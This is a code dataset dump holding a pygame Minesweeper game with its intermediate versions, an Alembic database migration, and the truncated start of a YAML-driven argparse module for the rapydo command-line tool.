elif self.questionmarks[cell_x][cell_y]:\n self.questionmarks[cell_x][cell_y] = False\n self.flags[cell_x][cell_y] = False\n else:\n self.flags[cell_x][cell_y] = True\n self.questionmarks[cell_x][cell_y] = False\n self.draw_board(self.board, self.revealed_cells, self.\n flags, self.questionmarks)\n win = True\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if self.board[x][y][0] == MINE and not self.flags[x][y\n ] or self.board[x][y][0\n ] != MINE and not self.revealed_cells[x][y]:\n win = False\n if win:\n self.game_over = True\n pygame.display.update()\n CLOCK.tick(FPS)\n\n @staticmethod\n def get_board():\n icons = []\n mines = 0\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if mines < NUM_MINES:\n icons.append((MINE, RED))\n mines += 1\n else:\n icons.append((CLEAR, WHITE))\n random.shuffle(icons)\n board = []\n for x in range(GRID_WIDTH):\n column = []\n for y in range(GRID_HEIGHT):\n column.append(icons[0])\n del icons[0]\n board.append(column)\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n mines = 0\n if x > 0:\n if y > 0:\n if board[x - 1][y - 1][0] == MINE:\n mines += 1\n if board[x - 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x - 1][y + 1][0] == MINE:\n mines += 1\n if x < GRID_WIDTH - 1:\n if y > 0:\n if board[x + 1][y - 1][0] == MINE:\n mines += 1\n if board[x + 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x + 1][y + 1][0] == MINE:\n mines += 1\n if y > 0:\n if board[x][y - 1][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x][y + 1][0] == MINE:\n mines += 1\n if board[x][y][0] != MINE:\n if mines in range(1, 9):\n board[x][y] = str(mines), WHITE\n return board\n\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n\n @staticmethod\n def get_top_left_coordinates(row, column):\n left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN\n top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN\n return left, top\n\n def get_cell_at_pixel(self, x, y):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH)\n if cell_rect.collidepoint(x, y):\n return cell_x, cell_y\n return None, None\n\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if not revealed[cell_x][cell_y]:\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5)\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half +\n left, top), (left, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2), (left + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render('?', 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n else:\n shape, color = self.get_shape_and_color(board, cell_x,\n cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n\n def draw_icon(self, shape, color, cell_x, cell_y):\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if shape == CLEAR:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n elif shape == MINE:\n pygame.draw.ellipse(SURFACE, color, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n else:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render(shape, 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n\n def highlight_cell(self, cell_x, cell_y):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n pygame.draw.rect(SURFACE, HIGHLIGHT_COLOR, (left - CELL_MARGIN / 2,\n top - CELL_MARGIN / 2, CELL_SIDE_LENGTH + CELL_MARGIN, \n CELL_SIDE_LENGTH + CELL_MARGIN), 2)\n\n def reveal_cells(self, x, y, board, revealed, flags, questionmarks):\n if revealed[x][y]:\n return\n if flags[x][y]:\n return\n revealed[x][y] = True\n if board[x][y][0] != CLEAR:\n return\n if x > 0:\n if y > 0:\n self.reveal_cells(x - 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x - 1, y + 1, board, revealed, flags,\n questionmarks)\n if x < GRID_WIDTH - 1:\n if y > 0:\n self.reveal_cells(x + 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x + 1, y + 1, board, revealed, flags,\n questionmarks)\n if y > 0:\n self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)\n\n @staticmethod\n def create_menu():\n font = pygame.font.SysFont('times new roman', 20)\n label = font.render(' High scores', 1, BLACK)\n pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50))\n SURFACE.blit(label, (500, 135))\n\n\nclass Stopwatch:\n\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\ng = Game()\ng.main()\n",
"step-5": "import sys\nimport random\nimport pygame\nimport pygame.locals\nimport time\n\n# TODO high scores, difficulties\n\n# Absolutes (in pixels where not otherwise stated)\nCELL_SIDE_LENGTH = 40 # Side length of each cell\nCELL_MARGIN = 2 # Gap between cells\nGRID_HEIGHT = 10 # How many cells are in the grid\nGRID_WIDTH = 10\nX_BOARD_MARGIN = 50 # Gap between grid and sides of board\nY_BOARD_MARGIN = 75\nMENU_MARGIN = 100 # Amount of space on the right dedicated to the menu\nDIFFICULTY = 0.1 # Ratio of bombs (10% by default)\nFPS = 30 # frames per second (window refresh speed)\n\n# Relatives (so board size can easily be changed)\nNUM_MINES = 1 + int(GRID_WIDTH * GRID_HEIGHT * DIFFICULTY) # Default about 10% of the board is mines\nWINDOW_HEIGHT = (CELL_SIDE_LENGTH * GRID_HEIGHT) + (CELL_MARGIN * GRID_HEIGHT) + (Y_BOARD_MARGIN * 2)\nWINDOW_WIDTH = (CELL_SIDE_LENGTH * GRID_WIDTH) + (CELL_MARGIN * GRID_WIDTH) + (X_BOARD_MARGIN * 2) + MENU_MARGIN\n\n# R G B (not all used, but kept so theme can easily be changed)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\nGREEN = (0, 255, 0)\nMIDGREEN = (40, 190, 40)\nCYAN = (0, 255, 255)\nBLUE = (0, 0, 255)\nDARKBLUE = (20, 20, 60)\nMAGENTA = (255, 0, 255)\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGRAY = (200, 200, 200)\n\nBG_COLOR = DARKBLUE # Background color\nCELL_COLOR = GRAY # Universal cover color\nHIGHLIGHT_COLOR = CYAN # Cell the cursor is currently hovering over\nFLAG_COLOR = MIDGREEN\n\n# Symbols\nFLAG = 'flag'\nMINE = 'mine'\nCLEAR = 'clear'\n\n\nclass Game:\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n\n self.mouse_x = 0 # Stores x-coordinate of mouse event\n self.mouse_y = 0 # Stores y-coordinate of mouse event\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n\n SURFACE.fill(BG_COLOR)\n\n def main(self):\n\n while True:\n left_click = False\n right_click = False\n\n SURFACE.fill(BG_COLOR)\n self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)\n self.create_menu()\n\n font = pygame.font.SysFont(\"times new roman\", 25)\n\n # Timer (will be used to implement high scores)\n self.timer.start()\n t1 = self.timer.get_seconds()\n label = font.render(str(t1), 1, MAGENTA)\n SURFACE.blit(label, (50, 50))\n\n # Mouse event handling\n for event in pygame.event.get():\n if event.type == pygame.locals.QUIT:\n pygame.quit()\n sys.exit() # Even if the window closes, we still need to manually stop the processes\n elif event.type == pygame.locals.MOUSEMOTION:\n self.mouse_x, self.mouse_y = event.pos # For hovering info\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 1: # Left click\n self.mouse_x, self.mouse_y = event.pos\n print(self.mouse_x, self.mouse_y)\n left_click = True\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 3: # Right click\n self.mouse_x, self.mouse_y = event.pos\n right_click = True\n\n # If user decided to start over, reinitialize game\n if self.game_over and right_click:\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n right_click = False\n\n # TODO tweak spacing on text\n if self.game_over:\n self.timer.pause()\n score = self.timer.get_seconds()\n\n a_x = X_BOARD_MARGIN + ((GRID_WIDTH / 4) * CELL_SIDE_LENGTH)\n b_y = Y_BOARD_MARGIN + (Y_BOARD_MARGIN / 4) + (GRID_HEIGHT * CELL_SIDE_LENGTH) + (GRID_HEIGHT * CELL_MARGIN)\n font = pygame.font.SysFont(\"times new roman\", 25)\n if win:\n label = font.render('Congratulations, you won!', 1, GREEN)\n SURFACE.blit(label, (a_x - 75, b_y))\n label = font.render('Score: ' + str(score), 1, GREEN)\n SURFACE.blit(label, (a_x + 200, b_y))\n else:\n label = font.render('GAME OVER', 1, RED)\n SURFACE.blit(label, (a_x + 10, b_y))\n label = font.render('Press RIGHT mouse button', 1, YELLOW)\n SURFACE.blit(label, (a_x - 50, b_y + 25))\n\n cell_x, cell_y = self.get_cell_at_pixel(self.mouse_x, self.mouse_y)\n if cell_x is not None and cell_y is not None: # If mouse is hovering over a cell during mouse event\n\n # Highlight cell\n if not self.revealed_cells[cell_x][cell_y] and not self.game_over:\n self.highlight_cell(cell_x, cell_y)\n\n # Digging somewhere\n if not self.revealed_cells[cell_x][cell_y] and left_click and not self.game_over:\n\n # So you can't accidentally click a flagged/question mark space\n if not self.flags[cell_x][cell_y] and not self.questionmarks[cell_x][cell_y]:\n\n self.flags[cell_x][cell_y] = False\n\n if self.board[cell_x][cell_y][0] == MINE: # If you dig a mine, reveal all cells & game over\n self.revealed_cells = self.generate_data(True)\n self.game_over = True\n\n elif self.board[cell_x][cell_y][0] == CLEAR: # If you dig a clear cell, reveal that cell\n self.reveal_cells(cell_x, cell_y, self.board, self.revealed_cells, self.flags, self.questionmarks)\n\n else:\n self.revealed_cells[cell_x][cell_y] = True # Set the cell as revealed\n\n # Redraw board after mouse event\n self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)\n\n # Placing a flag- if flag already there, change flag to question mark.\n # If question mark already there, turn to nothing. If nothing there, turn on flag\n if not self.revealed_cells[cell_x][cell_y] and right_click and not self.game_over:\n if self.flags[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n self.questionmarks[cell_x][cell_y] = True\n elif self.questionmarks[cell_x][cell_y]:\n self.questionmarks[cell_x][cell_y] = False\n self.flags[cell_x][cell_y] = False\n else:\n self.flags[cell_x][cell_y] = True\n self.questionmarks[cell_x][cell_y] = False\n\n # Flag is drawn in this method call\n self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)\n\n # This block decides whether or not the player has won yet after a mouse event\n win = True\n for x in range(GRID_WIDTH): # If a cell is a mine and not flagged, or if a cell is clear\n for y in range(GRID_HEIGHT): # but not revealed, then the game is not yet over\n if (self.board[x][y][0] == MINE and not self.flags[x][y]) or (\n self.board[x][y][0] != MINE and not self.revealed_cells[x][y]):\n win = False\n\n if win:\n self.game_over = True\n\n # Redraw the screen and wait for clock tick\n pygame.display.update()\n CLOCK.tick(FPS)\n\n @staticmethod\n def get_board():\n icons = []\n mines = 0\n\n # Bottom of board is made of only mines and clear cells, which is then selectively covered for gameplay\n # Making randomized array\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if mines < NUM_MINES:\n icons.append((MINE, RED))\n mines += 1\n else:\n icons.append((CLEAR, WHITE))\n random.shuffle(icons)\n\n # Create static under-board\n board = []\n for x in range(GRID_WIDTH):\n column = []\n for y in range(GRID_HEIGHT):\n column.append(icons[0])\n del icons[0] # so the next icon[0] is the one after this\n board.append(column)\n\n # This block determines how many mines are around each cell, and adds the number to the board's array\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n mines = 0\n\n if x > 0:\n if y > 0: # If not on the left edge AND not on top edge\n if board[x - 1][y - 1][0] == MINE:\n mines += 1\n if board[x - 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x - 1][y + 1][0] == MINE:\n mines += 1\n\n if x < GRID_WIDTH - 1:\n if y > 0: # If not on right edge AND not on top edge\n if board[x + 1][y - 1][0] == MINE:\n mines += 1\n if board[x + 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x + 1][y + 1][0] == MINE:\n mines += 1\n\n if y > 0: # If not on right or left edge AND not on top edge\n if board[x][y - 1][0] == MINE:\n mines += 1\n\n if y < GRID_HEIGHT - 1: # If not on riht or left edge AND on bottom edge\n if board[x][y + 1][0] == MINE:\n mines += 1\n\n # If the cell is clear and there are mines around it, add the number of mines to board array\n if board[x][y][0] != MINE:\n if mines in range(1, 9):\n board[x][y] = (str(mines), WHITE)\n\n return board\n\n # Used to show full board on game over & reset board on game start\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n\n # Convert row, column coordinates into x, y pixel coordinates (for drawing shapes)\n @staticmethod\n def get_top_left_coordinates(row, column):\n left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN\n top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN\n return left, top\n\n # Convert x, y pixel coordinates to row, column coordinates (for mouse hovering)\n def get_cell_at_pixel(self, x, y):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH)\n if cell_rect.collidepoint(x, y): # If currently hovering over a cell\n return cell_x, cell_y\n return None, None # If not currently hovering over a cell\n\n # Redraws board after mouse event\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n\n # Symbols not added on board creation must be drawn here: \"unrevealed\" boxes, flags, and question marks\n if not revealed[cell_x][cell_y]:\n # Draw a gray box over unrevealed cell, so value isn't affected but user can't see the value\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5) # Relative point halfway through cell\n # top point, bottom left point, bottom right point\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half + left, top),\n (left, top + CELL_SIDE_LENGTH - CELL_MARGIN/2),\n (left + CELL_SIDE_LENGTH - CELL_MARGIN/2, top +\n CELL_SIDE_LENGTH - CELL_MARGIN/2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont(\"times new roman\", fontsize)\n label = font.render(\"?\", 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n\n else: # Draw revealed cells\n shape, color = self.get_shape_and_color(board, cell_x, cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n\n # Draws icon passed to it in the stated cell\n def draw_icon(self, shape, color, cell_x, cell_y):\n\n # Relative point of quarter-way through cell\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n\n left, top = self.get_top_left_coordinates(cell_x, cell_y) # Drawing of all images starts at top left corner\n\n # Draw the shapes\n if shape == CLEAR:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n\n elif shape == MINE:\n pygame.draw.ellipse(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n\n # Flag shape & question mark in draw_board because they are activated via mouse event\n\n else: # Clear with num\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont(\"times new roman\", fontsize)\n label = font.render(shape, 1, BLACK) # a cell with number corresponds to shapes \"1\", \"2\", etc.\n SURFACE.blit(label, (left + quarter, top))\n\n # Returns the shape and color of icon to be created in draw_icon method\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n # shape value for cell x, y is stored in board[x][y][0], color value in board[x][y][1]\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n\n # Draws a box around the cell the mouse is hovering over, 'highlighting' it\n def highlight_cell(self, cell_x, cell_y):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n # Changes with cell size, but line width is hard-set at 2px (last argument)\n pygame.draw.rect(SURFACE, HIGHLIGHT_COLOR, (left - (CELL_MARGIN / 2), top - (CELL_MARGIN / 2),\n CELL_SIDE_LENGTH + CELL_MARGIN, CELL_SIDE_LENGTH + CELL_MARGIN), 2)\n\n # Reveals clear cells next to clear cell the user clicked (and clear cells next to those cells, etc.)\n def reveal_cells(self, x, y, board, revealed, flags, questionmarks):\n if revealed[x][y]: # If the cell is already revealed, do nothing\n return\n if flags[x][y]: # If the cell already has a flag on it, do nothing\n return\n revealed[x][y] = True\n if board[x][y][0] != CLEAR:\n return\n if x > 0:\n if y > 0:\n self.reveal_cells(x - 1, y - 1, board, revealed, flags, questionmarks)\n self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x - 1, y + 1, board, revealed, flags, questionmarks)\n\n if x < GRID_WIDTH - 1:\n if y > 0:\n self.reveal_cells(x + 1, y - 1, board, revealed, flags, questionmarks)\n self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x + 1, y + 1, board, revealed, flags, questionmarks)\n\n if y > 0:\n self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)\n\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)\n\n @staticmethod\n def create_menu():\n font = pygame.font.SysFont(\"times new roman\", 20)\n label = font.render(\" High scores\", 1, BLACK)\n pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50)) # view high scores\n SURFACE.blit(label, (500, 135))\n\n\nclass Stopwatch:\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\ng = Game()\ng.main()\n",
"step-ids": [
10,
16,
17,
21,
22
]
}
|
[
10,
16,
17,
21,
22
] |
"""empty message
Revision ID: 6374505f9e6e
Revises: 9dc91bb7d2ba
Create Date: 2016-11-14 10:55:08.418923
"""
# revision identifiers, used by Alembic.
revision = '6374505f9e6e'
down_revision = '9dc91bb7d2ba'
from alembic import op
import sqlalchemy as sa
import sqlalchemy.types as ty
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.alter_column('run', 'polarion_id', type_=ty.String(65535))
op.alter_column('auto_result', 'skip', type_=ty.Text())
op.alter_column('auto_result', 'failure', type_=ty.Text())
op.alter_column('auto_result', 'comment', type_=ty.Text())
op.alter_column('manual_result', 'comment', type_=ty.Text())
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.alter_column('run', 'polarion_id', type_=ty.String(1024))
op.alter_column('auto_result', 'skip', type_=ty.String(65535))
op.alter_column('auto_result', 'failure', type_=ty.String(65535))
op.alter_column('auto_result', 'comment', type_=ty.String(65535))
op.alter_column('manual_result', 'comment', type_=ty.String(65535))
### end Alembic commands ###
|
normal
|
{
"blob_id": "7badb7c9f1e00dfc379468b7bd73a3f09bffe6de",
"index": 1191,
"step-1": "<mask token>\n\n\ndef downgrade():\n op.alter_column('run', 'polarion_id', type_=ty.String(1024))\n op.alter_column('auto_result', 'skip', type_=ty.String(65535))\n op.alter_column('auto_result', 'failure', type_=ty.String(65535))\n op.alter_column('auto_result', 'comment', type_=ty.String(65535))\n op.alter_column('manual_result', 'comment', type_=ty.String(65535))\n",
"step-2": "<mask token>\n\n\ndef upgrade():\n op.alter_column('run', 'polarion_id', type_=ty.String(65535))\n op.alter_column('auto_result', 'skip', type_=ty.Text())\n op.alter_column('auto_result', 'failure', type_=ty.Text())\n op.alter_column('auto_result', 'comment', type_=ty.Text())\n op.alter_column('manual_result', 'comment', type_=ty.Text())\n\n\ndef downgrade():\n op.alter_column('run', 'polarion_id', type_=ty.String(1024))\n op.alter_column('auto_result', 'skip', type_=ty.String(65535))\n op.alter_column('auto_result', 'failure', type_=ty.String(65535))\n op.alter_column('auto_result', 'comment', type_=ty.String(65535))\n op.alter_column('manual_result', 'comment', type_=ty.String(65535))\n",
"step-3": "<mask token>\nrevision = '6374505f9e6e'\ndown_revision = '9dc91bb7d2ba'\n<mask token>\n\n\ndef upgrade():\n op.alter_column('run', 'polarion_id', type_=ty.String(65535))\n op.alter_column('auto_result', 'skip', type_=ty.Text())\n op.alter_column('auto_result', 'failure', type_=ty.Text())\n op.alter_column('auto_result', 'comment', type_=ty.Text())\n op.alter_column('manual_result', 'comment', type_=ty.Text())\n\n\ndef downgrade():\n op.alter_column('run', 'polarion_id', type_=ty.String(1024))\n op.alter_column('auto_result', 'skip', type_=ty.String(65535))\n op.alter_column('auto_result', 'failure', type_=ty.String(65535))\n op.alter_column('auto_result', 'comment', type_=ty.String(65535))\n op.alter_column('manual_result', 'comment', type_=ty.String(65535))\n",
"step-4": "<mask token>\nrevision = '6374505f9e6e'\ndown_revision = '9dc91bb7d2ba'\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlalchemy.types as ty\n\n\ndef upgrade():\n op.alter_column('run', 'polarion_id', type_=ty.String(65535))\n op.alter_column('auto_result', 'skip', type_=ty.Text())\n op.alter_column('auto_result', 'failure', type_=ty.Text())\n op.alter_column('auto_result', 'comment', type_=ty.Text())\n op.alter_column('manual_result', 'comment', type_=ty.Text())\n\n\ndef downgrade():\n op.alter_column('run', 'polarion_id', type_=ty.String(1024))\n op.alter_column('auto_result', 'skip', type_=ty.String(65535))\n op.alter_column('auto_result', 'failure', type_=ty.String(65535))\n op.alter_column('auto_result', 'comment', type_=ty.String(65535))\n op.alter_column('manual_result', 'comment', type_=ty.String(65535))\n",
"step-5": "\"\"\"empty message\n\nRevision ID: 6374505f9e6e\nRevises: 9dc91bb7d2ba\nCreate Date: 2016-11-14 10:55:08.418923\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '6374505f9e6e'\ndown_revision = '9dc91bb7d2ba'\n\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlalchemy.types as ty\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('run', 'polarion_id', type_=ty.String(65535))\n op.alter_column('auto_result', 'skip', type_=ty.Text())\n op.alter_column('auto_result', 'failure', type_=ty.Text())\n op.alter_column('auto_result', 'comment', type_=ty.Text())\n op.alter_column('manual_result', 'comment', type_=ty.Text())\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('run', 'polarion_id', type_=ty.String(1024))\n op.alter_column('auto_result', 'skip', type_=ty.String(65535))\n op.alter_column('auto_result', 'failure', type_=ty.String(65535))\n op.alter_column('auto_result', 'comment', type_=ty.String(65535))\n op.alter_column('manual_result', 'comment', type_=ty.String(65535))\n ### end Alembic commands ###\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding: utf-8 -*-
"""
Automatically create and parse commands
based on a YAML configuration file.
NOTE: we can't have a logger here,
before knowing the level of debug.
"""
import os
import sys
import argparse
from controller import __version__, PROJECTRC, PROJECTRC_ALTERNATIVE
from controller.conf_utilities import load_yaml_file
from controller import log
class ArgParser:
def __init__(self, args=None):
if args is None:
args = sys.argv
self.current_args = {}
self.host_configuration = {}
# This method can raise ValueErrors
self.check_args(args)
# This method saves configuration objects in self
self.read_configuration()
# Arguments definition
parser = argparse.ArgumentParser(
prog=args[0], description=self.parse_conf.get('description')
)
# PARAMETERS
sorted_options = sorted(self.parse_conf.get('options', {}).items())
for option_name, options in sorted_options:
self.add_parser_argument(parser, option_name, options)
version_string = 'rapydo version {}'.format(__version__)
parser.add_argument('--version', action='version', version=version_string)
# Sub-parser of commands [check, init, etc]
main_command = self.parse_conf.get('action')
subparsers = parser.add_subparsers(
title='Available commands',
dest=main_command.get('name'),
help=main_command.get('help'),
)
subparsers.required = True
# ##########################
# COMMANDS
# BASE normal commands
mycommands = self.parse_conf.get('subcommands', {})
for command_name, options in sorted(mycommands.items()):
# Creating a parser for each sub-command [check, init, etc]
subparse = subparsers.add_parser(
command_name, help=options.get('description')
)
# controlcommands = options.get('controlcommands', {})
# # Some subcommands can have further subcommands
# [control start, stop, etc]
# if len(controlcommands) > 0:
# innerparser = subparse.add_subparsers(
# dest='controlcommand'
# )
# innerparser.required = options.get('controlrequired', False)
# for subcommand, suboptions in controlcommands.items():
# subcommand_help = suboptions.pop(0)
# # Creating a parser for each sub-sub-command
# # [control start/stop]
# innerparser.add_parser(subcommand, help=subcommand_help)
suboptions = options.get('suboptions', {}).items()
for option_name, suboptions in suboptions:
self.add_parser_argument(subparse, option_name, suboptions)
# ##########################
# Print usage if no arguments provided
if len(args) == 1:
parser.print_help()
sys.exit(1)
# ##########################
# Reading input parameters
# Partial parsing
# https://docs.python.org/3.4/library/argparse.html#partial-parsing
# Example
# https://gist.github.com/von/949337/
# self.current_args = parser.parse_args()
current_args_namespace, self.remaining_args = parser.parse_known_args(args[1:])
self.current_args = vars(current_args_namespace)
# custom commands as a separate parser
self.extra_parser = argparse.ArgumentParser(
description='Custom rapydo commands from your own configuration',
add_help=False,
usage='\n$ rapydo custom CUSTOM_COMMAND',
)
self.extra_command_parser = self.extra_parser.add_subparsers(
title='Available custom commands',
dest='custom',
help='list of custom commands',
)
self.extra_command_parser.required = True
# ##########################
if self.current_args.get("log_level", "DEPRECATED") != "DEPRECATED":
# Deprecated since version 0.7.0
log.warning(
"--log-level parameter is deprecated, set env variable LOGURU_LEVEL")
log.verbose("Parsed arguments: {}", self.current_args)
def add_parser_argument(self, parser, option_name, options):
params = self.prepare_params(options)
alias = params.pop('alias', None)
positional = params.pop('positional', False)
param_name = '--{}'.format(option_name)
if positional:
parser.add_argument(option_name, **params)
elif alias is None:
parser.add_argument(param_name, **params)
else:
parser.add_argument(param_name, '-{}'.format(alias), **params)
@staticmethod
def check_args(args):
# Check on format
for element in args:
if element.startswith('--') and '_' in element:
raise ValueError(
"Wrong \"{}\" option provided.\n".format(element)
+ "Arguments containing '_' are not allowed.\n"
+ "Use '-' instead\n"
)
# NOTE: the standard is to use only '-' separators for arguments
# beware: argparse converts them into '_' when you want to retrieve
def read_configuration(self):
# READ MAIN FILE WITH COMMANDS AND OPTIONS
self.parse_conf = load_yaml_file(
'argparser.yaml', path=os.path.dirname(os.path.realpath(__file__))
)
try:
# READ PROJECT INIT FILE: .projectrc
pinit_conf = load_yaml_file(
PROJECTRC, path=os.curdir, is_optional=True)
# Allow alternative for PROJECT INIT FILE: .project.yml
if len(pinit_conf) < 1:
pinit_conf = load_yaml_file(
PROJECTRC_ALTERNATIVE, path=os.curdir, is_optional=True)
except AttributeError as e:
log.exit(e)
self.host_configuration = pinit_conf.pop('project_configuration', {})
# Mix with parse_conf
for key, value in pinit_conf.items():
